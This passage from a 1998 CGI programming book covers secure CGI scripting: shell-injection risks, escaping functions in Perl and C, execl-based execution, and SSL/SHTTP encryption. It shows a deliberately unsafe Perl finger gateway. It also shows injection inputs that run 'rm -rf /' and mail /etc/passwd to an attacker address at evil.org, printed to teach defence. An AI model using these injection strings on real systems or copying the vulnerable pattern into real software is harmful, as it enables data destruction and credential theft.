finger @fake.machine.org > results
This would finger the host fake.machine.org
and save the results to the text file results.
The > character in this
case is a redirection character. If you wanted to actually use
the > character-for example,
if you want to echo it to the screen-you would need to precede
the character with a backslash. For example, the following would
print a greater-than symbol >
to the screen:
echo \>
This is called escaping or sanitizing the character
string.
How can a hacker use this information to his or her advantage?
Observe the finger gateway written in Perl in Listing 9.3. All
this program is doing is allowing the user to specify a user and
a host, and the CGI will finger the user at the host and display
the results.
Listing 9.3. finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway
require 'cgi-lib.pl';
print &PrintHeader;
if (&ReadParse(*in)) {
print "<pre>\n";
print `/usr/bin/finger $in{'username'}`;
print "</pre>\n";
}
else {
print "<html> <head>\n";
print "<title>Finger Gateway</title>\n";
print "</head>\n<body>\n";
print "<h1>Finger Gateway</h1>\n";
print "<form method=POST>\n";
print "<p>User@Host: <input type=text name=\"username\">\n";
print "<p><input type=submit>\n";
print "</form>\n";
print "</body> </html>\n";
}
At first glance, this might seem like a harmless finger gateway.
There's no danger of a buffer overflow because it is written in
Perl. I use the complete pathname of the finger binary so the
gateway can't be tricked into using a fake finger program. If
the input is in an improper format, the gateway will return an
error but not one that can be manipulated.
However, what if I try entering the following field (as shown
in Figure 9.1):
Figure 9.1 : Text to manipulate unsafe finger gateway.
nobody@nowhere.org ; /bin/rm -rf /
Work out how the following line will deal with this input:
print `/usr/bin/finger $in{'username'}`;
Because you are using back ticks, first it will spawn a shell.
Then it will execute the following command:
/usr/bin/finger nobody@nowhere.org ; /bin/rm -rf /
What will this do? Imagine typing this in at the command line.
It will wipe out all of the files and directories it can, starting
from the root directory. We need to sanitize this input to render
the semicolon (;) metacharacter
harmless. In Perl, this is easily achieved with the function listed
in Listing 9.4. (The equivalent function for C is in Listing 9.5;
this function is from the cgihtml C library.)
Listing 9.4. escape_input()
in Perl.
sub escape_input {
    # work on a copy of the first argument; s/// cannot bind to @_
    my ($str) = @_;
    $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
    return $str;
}
Listing 9.5. escape_input()
in C.
#include <stdlib.h>
#include <string.h>

/* Takes a string and escapes all shell metacharacters. Should be used
   before including the string in system() or a similar call. Returns a
   newly allocated string that the caller must free, or NULL if malloc()
   fails. */
char *escape_input(char *str)
{
    size_t i, j = 0;
    size_t len = strlen(str);
    /* worst case: every character needs a backslash, plus the null */
    char *new = malloc(sizeof(char) * (len * 2 + 1));

    if (new == NULL)
        return NULL;
    for (i = 0; i < len; i++) {
        switch (str[i]) {
        case '|': case '&': case ';': case '(': case ')': case '<':
        case '>': case '\'': case '"': case '*': case '?': case '\\':
        case '[': case ']': case '$': case '!': case '#': case '`':
        case '{': case '}':
            new[j] = '\\';
            j++;
            break;
        default:
            break;
        }
        new[j] = str[i];
        j++;
    }
    new[j] = '\0';   /* terminate the string */
    return new;
}
This returns a string with the shell metacharacters preceded by
a backslash. The revised finger.cgi gateway is in Listing 9.6.
Listing 9.6. A safe finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - a safe finger gateway
require 'cgi-lib.pl';
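sub escape_input {
    # work on a copy of the first argument; s/// cannot bind to @_
    my ($str) = @_;
    $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
    return $str;
}
print &PrintHeader;
if (&ReadParse(*in)) {
print "<pre>\n";
# function calls are not interpolated inside back ticks, so escape first
$username = &escape_input($in{'username'});
print `/usr/bin/finger $username`;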
print "</pre>\n";
}
else {
print "<html> <head>\n";
print "<title>Finger Gateway</title>\n";
print "</head>\n<body>\n";
print "<h1>Finger Gateway</h1>\n";
print "<form method=POST>\n";
print "<p>User@Host: <input type=text name=\"username\">\n";
print "<p><input type=submit>\n";
print "</form>\n";
print "</body> </html>\n";
}
This time, if you try the same input as the preceding, a shell
is spawned and it tries to execute:
/usr/bin/finger nobody@nowhere.org \; /bin/rm -rf /
The malicious attempt has been rendered useless. Rather than attempt
to delete all the directories on the file system, it will try
to finger the users nobody@nowhere.org,
;, /bin/rm,
-rf, and /.
It will probably return an error because it is unlikely that the
latter four users exist on your system.
Note a couple of things. First, if your Web server was configured
correctly (for example, running as non-root), the attempt to delete
everything on the file system would have failed. (If the server
was running as root, then the potential damage is limitless. Never
do this!) Additionally, the user would have to assume that the
rm command was in the /bin
directory. He or she could also have assumed that rm
was in the path. Both of these are pretty reasonable
guesses for the majority of UNIX machines, but they are not global
truths. In a chrooted environment
that did not have the rm
binary located anywhere in the directory tree, the hacker's efforts
would have been a useless endeavor. By properly securing and configuring
the Web server, you can theoretically minimize the potential damage
to almost zero, even with a badly written script.
However, this is no cause to lessen your caution when writing
your CGI programs. In reality, most Web environments are not chrooted,
simply because it prevents the flexibility many people need in
a Web server. Even if one could not remove all the files in a
file system because the server was not running as root, someone
could just as easily try input such as the following, which would
have e-mailed the /etc/passwd
file to me@evil.org for possible
cracking:
nobody@nowhere.org ; /bin/mail me@evil.org < /etc/passwd
A hacker could do any number of other things by manipulating this
one hole, even in a well-configured environment. If you let a
hole slip past you in a simple CGI program, how can you be sure
you properly and securely configured your complicated UNIX system
and Web server?
The answer is, you can't. Your best bet is to make sure your CGI
programs are secure. Not sanitizing input before running it in
a shell is a simple thing to cure, and yet it is one of the most
common mistakes in CGI programming.
Fortunately, Perl has a good mechanism for catching potentially
tainted variables. If you use taintperl instead of Perl (or perl
-T if you are using Perl 5), the script will exit at points where
potentially tainted variables are passed to a shell command. This
will help you catch all instances of potentially tainted variables
before you actually begin to use your CGI program.
Notice that there are several more functions in Perl that spawn
the shell than there are in C. It is not immediately obvious,
even to the intermediate Perl programmer, that back ticks spawn
a shell before executing the program. This is the flip-side
danger of a higher-level language; you don't know what security
holes a function might cause because you don't necessarily know
exactly what it does.
You don't need to sanitize the input if you avoid using functions
that spawn shells. In Perl, you can do this with either the system()
or exec() function by passing the program and each of its arguments
as separate list elements instead of as a single string. For example,
the following is safe without sanitizing the input:
system("/usr/bin/finger", $in{'username'});
However, in the case of your finger gateway, this feature is useless
because you need to process the output of the finger
command, and there is no way to trap it if you use the system()
function.
In C, you can also execute programs directly by using the exec
class of functions: execv(),
execl(), execvp(),
execlp(), and execle().
execl() would be the C equivalent
of the Perl function system()
with multiple arguments. Which exec
function you use and how you implement it depends on your need;
specifics go beyond the scope of this book.
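As an illustration of the direct approach in C, the following sketch runs a program with one argument by using fork() and execl(), and collects the program's output through a pipe, so no shell ever sees the argument. The function name run_and_capture() and its parameters are hypothetical; the sketch assumes a POSIX system and handles only a single argument.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs path with a single argument, without a shell, and copies up to
   outlen - 1 bytes of its standard output into out (always
   null-terminated). Returns the child's exit status, or -1 on failure. */
int run_and_capture(const char *path, const char *arg, char *out, size_t outlen)
{
    int fds[2], status;
    size_t used = 0;
    ssize_t n;
    pid_t pid;

    assert(path != NULL && arg != NULL && out != NULL && outlen > 0);
    if (pipe(fds) == -1)
        return -1;
    pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                       /* child */
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);      /* stdout now feeds the pipe */
        close(fds[1]);
        execl(path, path, arg, (char *) NULL);  /* arg is passed verbatim */
        _exit(127);                       /* reached only if execl() failed */
    }
    close(fds[1]);                        /* parent only reads */
    while (used < outlen - 1 &&
           (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t) n;
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A finger gateway might call run_and_capture("/usr/bin/finger", username, buffer, sizeof buffer). Shell metacharacters in the argument have no special meaning here, although an argument beginning with - could still be read as an option by the program itself, so checking the input's format remains worthwhile.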
One aspect of security only briefly discussed earlier is privacy.
A popular CGI application these days tends to be one that collects
credit card information. Data collection is a simple task for
a CGI application, but the collection of sensitive data requires
a secure means of getting the information from the browser to
the server and CGI program.
For example, suppose that I want to sell books over the Internet.
I might set up a Web server with a form that allows customers
to buy books by submitting personal information and a credit card
number. After I have that information, I want to store it on my
machine for company records.
If anyone were to break into my company's machine, that person
would have access to these confidential records containing customer
information and credit card numbers. In order to prevent this,
I would make sure the machine is configured securely and that
my CGI script that accepts form input is written correctly so
that it cannot be maliciously manipulated. In other words, as
the administrator of the machine and the CGI programmer, I have
a lot of control over the first problem: preventing information
from being stolen directly from my machine.
However, how can I prevent someone from intercepting the information
as it goes from the client to the server? Remember how information
moves from the Web browser to the CGI program (as explained in
Chapter 1, "Common Gateway Interface
(CGI)")? Information flows over the network from the browser
to the server first, and then the server passes the information
to the CGI program. This information can be intercepted while
it is moved from the client machine to the server (as shown in
Figure 9.2). Note that in order to protect
the information from being intercepted over the network, the information
must be encrypted between the client and the server. You cannot
implement a CGI-specific encryption scheme unless the client understands
it, as well.
Figure 9.2 : A diagram of the information flow between the client, server, and CGI application.
Java, CGI, and Secure Transactions
Due to the nature of Web transactions, the only way you could develop and use your own secure transaction protocol using only CGI would be by first encrypting the form information before it is submitted by the browser to the server. The scheme would look like the diagram in Figure 9.3.
Until recently, developing your own secure transaction protocol was an impossible task. Thanks to recent innovations in client-side processing such as Java, such development is now possible.
The idea is to create a Java interface that is a superset of normal HTML forms. When the Java Submit button is selected, the Java applet first encrypts the appropriate values before sending them to the Web server by using the normal POST HTTP request (see Figure 9.4).
Using Java as a client to send and receive encrypted data enables you to create your own customized encryption schemes without requiring a potentially expensive commercial server. For more information on how one might implement such a transaction, refer to Chapter 8, "Client/Server Issues."
Figure 9.3 : A secure transaction scheme using only CGI.
Figure 9.4 : An applet sends the form data instead of the browser.
Consequently, securing information over the network requires modifying
the way the browser and the server communicate, something that
cannot be controlled by using CGI. There are currently two major
proposals for encrypted client/server transactions: Secure Sockets
Layer (SSL), proposed by Netscape, and Secure HTTP (SHTTP), proposed
by Enterprise Integration Technologies (EIT). At this point, it
is not clear whether one scheme will become standard; several
companies have adopted both protocols in their servers. Consequently,
it is useful to know how to write CGI programs for both schemes.
SSL is a protocol-independent encryption scheme that provides
channel security between the application layer and transport layer
of a network packet (see Figure 9.5).
In plain English, this means that encrypted transactions are handled
"behind-the-scenes" by the server and are essentially
transparent to the HTML or CGI author.
Figure 9.5 : The SSL protocol providing secure Web transactions.
Because the client and server's network routines handle the encryption,
almost all of your CGI scripts should work without modification
with secure transactions. There is one notable exception. An nph
(no-parse-header) CGI program bypasses the server and communicates
directly with the client. Consequently, nph CGI scripts would
break under secure transactions because the information never
gets encrypted. A notable CGI application that is affected by
this problem is Netscape server-push animations (discussed in
detail in Chapter 14, "Proprietary
Extensions"). I doubt this is a major concern, however, because
it is highly likely that an animation is expendable on a page
for securely transmitting sensitive information.
SHTTP takes a different approach from SSL. It works by extending
the HTTP protocol (the application layer) rather than a lower
layer. Consequently, whereas SSL can be used for all network services,
SHTTP is a Web-specific protocol.
However, this has other benefits. As a superset of HTTP, SHTTP
is backward and forward compatible with HTTP and SHTTP browsers
and servers. In order to use SSL, you must have an SSL-enabled
browser and server. Additionally, SHTTP is a much more flexible
protocol. The server can designate preferred encryption schemes,
for example.
SHTTP transactions depend on additional HTTP headers. Consequently,
if you want your CGI program to take advantage of an SHTTP encrypted
transaction, you need to include the appropriate headers. For
example, instead of simply returning the HTTP header
Content-Type: text/html
you could return
Content-Type: text/html
Privacy-Enhancements: encrypt
When an SHTTP server receives this information from the CGI application,
it will know to encrypt the information before sending it to the
browser. A non-SHTTP browser will just ignore the extra header.
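In a C CGI program, emitting the extra header is just one more line of output before the blank line that ends the headers. The sketch below assumes the header name and value given in the example above; the function name print_cgi_headers() and its want_encryption flag are hypothetical.

```c
#include <assert.h>
#include <stdio.h>

/* Writes the CGI response headers to out. When want_encryption is
   nonzero, the SHTTP header from the example above is added. */
void print_cgi_headers(FILE *out, int want_encryption)
{
    assert(out != NULL);
    fputs("Content-Type: text/html\n", out);
    if (want_encryption)
        fputs("Privacy-Enhancements: encrypt\n", out);
    fputs("\n", out);   /* a blank line ends the headers */
}
```

A CGI program would typically call print_cgi_headers(stdout, 1) before writing any of the HTML body.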
For more information on using SHTTP, refer to the SHTTP specifications
located at <URL:http://www.commerce.net/information/standards/drafts/shttp.txt>.
Security is an all-encompassing thing when you are dealing with
networked applications such as the World Wide Web. Writing secure
CGI applications is not tremendously useful if your Web server
is not securely configured. A properly configured Web server,
on the other hand, can minimize the damage of a badly written
CGI script.
In general, remember the following principles:
- Your programs should do only what you
want them to do, no more.
- Don't reveal any more information about
your server than necessary.
- Minimize the potential damage if someone
successfully breaks into your machine.
- Make sure your applications are robust.
When you are writing CGI programs, be especially wary of the limitations
(or lack thereof) of your programming language and of passing
unsanitized variables to the shell.

Copyright 1998
EarthWeb Inc., All rights reserved.
Copyright 1998 Macmillan Computer Publishing. All rights reserved.